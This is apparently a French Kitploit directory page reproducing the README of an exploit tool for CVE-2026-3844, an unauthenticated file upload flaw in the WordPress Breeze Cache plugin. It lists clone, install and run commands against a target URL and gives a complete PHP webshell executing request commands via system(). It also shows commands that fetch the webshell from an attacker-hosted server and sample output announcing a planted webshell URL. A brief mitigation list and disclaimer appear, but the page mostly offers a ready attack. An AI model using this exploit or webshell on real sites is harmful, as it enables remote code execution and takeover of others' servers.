Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-3844 — WordPress - Breeze Cache <= 2.4.4 - Téléversement arbitraire de fichiers non authentifié | Kitploit
Outils/GitHubGitHub/0xgh057r3c0n/cve-2026-3844
Scanners de VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHub0xgh057r3c0n/cve-2026-3844

CVE-2026-3844

WordPress - Breeze Cache <= 2.4.4 - Téléversement arbitraire de fichiers non authentifié

Voir le dépôt
112il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
WordPress Logo

CVE-2026-3844

Breeze Cache ≤ 2.4.4 - Téléversement de fichier arbitraire non authentifié

MIT License Python 3.6+ WordPress


⚠️ Avertissement

root@kitploit:~
CET OUTIL EST FOURNI UNIQUEMENT À DES FINS ÉDUCATIVES ET DE RECHERCHE EN SÉCURITÉ.
L'accès non autorisé à des systèmes informatiques est illégal. Utilisez cet outil uniquement sur
des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test.
L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par ce logiciel.

📋 Description

CVE-2026-3844 est une vulnérabilité critique de téléversement de fichier arbitraire non authentifié dans le plugin Breeze Cache pour WordPress (versions ≤ 2.4.4). Le plugin ne parvient pas à valider correctement le paramètre srcset dans les commentaires, permettant à des attaquants distants de téléverser des fichiers malveillants (y compris des webshells) sur le serveur.

🔴 Sévérité

  • Score CVSS : 9,8 (Critique)
  • Vecteur d'attaque : Réseau
  • Authentification requise : Non
  • Impact : Exécution de code à distance (RCE)

🎯 Versions affectées

  • Breeze Cache ≤ 2.4.4
  • WordPress toutes versions (dépendant du plugin)

🔧 Détails techniques

La vulnérabilité exploite la fonctionnalité de mise en cache Gravatar dans Breeze. Lorsqu'un commentaire est publié avec un paramètre srcset spécialement conçu contenant une URL de fichier distante, Breeze télécharge et stocke le fichier localement dans :

root@kitploit:~
/wp-content/cache/breeze-extra/gravatars/[marqueur_aléatoire][extension_fichier]

Condition préalable : L'option « Héberger les fichiers localement - Gravatars » doit être activée dans les paramètres de Breeze.

🚀 Installation

root@kitploit:~
# Cloner le dépôt
git clone https://github.com/0xgh057r3c0n/CVE-2026-3844.git
cd CVE-2026-3844

# Installer les dépendances
pip install pycurl termcolor

💻 Utilisation

Utilisation de base

root@kitploit:~
python3 CVE-2026-3844.py -u http://cible.com

Options avancées

root@kitploit:~
# Vérifier si la cible est vulnérable sans exploitation
python3 CVE-2026-3844.py -u http://cible.com --check-only

# Utiliser une URL de payload personnalisée
python3 CVE-2026-3844.py -u http://cible.com -p http://votre-serveur.com/payload.php

# Enregistrer la sortie dans un fichier
python3 CVE-2026-3844.py -u http://cible.com -o shells.txt

# Augmenter le délai d'attente pour les cibles lentes
python3 CVE-2026-3844.py -u http://cible.com --timeout 30

Arguments de ligne de commande

ArgumentDescription
-u, --urlURL cible (obligatoire)
-p, --payloadURL du payload distant
--timeoutDélai d'attente de la requête en secondes (défaut : 15)
--check-onlyVérifier uniquement si la cible est vulnérable
-o, --outputEnregistrer l'URL du shell dans un fichier

📝 Exemple de payload personnalisé

Créez votre propre webshell (shell.php) :

root@kitploit:~
<?php
if(isset($_REQUEST['cmd'])) {
    echo "<pre>";
    system($_REQUEST['cmd']);
    echo "</pre>";
}
?>

Hébergez-le à un endroit accessible, puis utilisez :

root@kitploit:~
python3 CVE-2026-3844.py -u http://cible.com -p http://votre-serveur.com/shell.php

🔍 Chaîne de vérification

L'exploit vérifie automatiquement la présence de la chaîne de vérification 4356452d323032362d33383434 (encodée en hexadécimal « CVE-2026-3844 ») dans le fichier téléversé pour confirmer le succès de l'exploitation.

🛡️ Atténuation

  1. Mettre à jour Breeze Cache vers la version 2.4.5 ou supérieure
  2. Désactiver « Héberger les fichiers localement - Gravatars » si ce n'est pas nécessaire
  3. Implémenter des règles de pare-feu applicatif web (WAF)
  4. Auditer régulièrement la fonctionnalité de commentaires

📸 Capture d'écran

root@kitploit:~
[*] PHASE 1 : ÉVALUATION DE LA VULNÉRABILITÉ
[*] Vérification de la version du plugin Breeze...
[+] Cible VULNÉRABLE (Breeze v2.4.4)

[*] PHASE 2 : EXPLOITATION
[!] EXIGENCE : « Héberger les fichiers localement - Gravatars » DOIT ÊTRE ACTIVÉ
[*] Étape 1 : Envoi du commentaire malveillant...
[+] Commentaire publié avec succès
[*] Étape 2 : Attente de la mise en cache du fichier par Breeze...
[*] Étape 3 : Vérification du fichier téléversé...
[+] Fichier trouvé à : http://cible.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php
[+] CHAÎNE DE VÉRIFICATION TROUVÉE - EXPLOITATION RÉUSSIE !

[✓] STATUT : SUCCÈS
[✓] URL DU WEBSHELL : http://cible.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php

📁 Structure du répertoire

root@kitploit:~
CVE-2026-3844/
├── CVE-2026-3844.py    # Script d'exploitation principal
├── README.md            # Ce fichier
└── LICENSE              # Licence MIT

📄 Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.

🙏 Crédits

  • Auteur : 0xgh057r3c0n
  • Découverte : Équipe de recherche en sécurité
  • ID CVE : CVE-2026-3844

📞 Contact

  • GitHub : @0xgh057r3c0n
  • Signaler des problèmes : Problèmes GitHub

⭐ Support

Si vous trouvez cet outil utile, veuillez lui attribuer une étoile ⭐ sur GitHub !


Conçu avec 🐍 Python | À des fins éducatives uniquement
Télécharger l’outil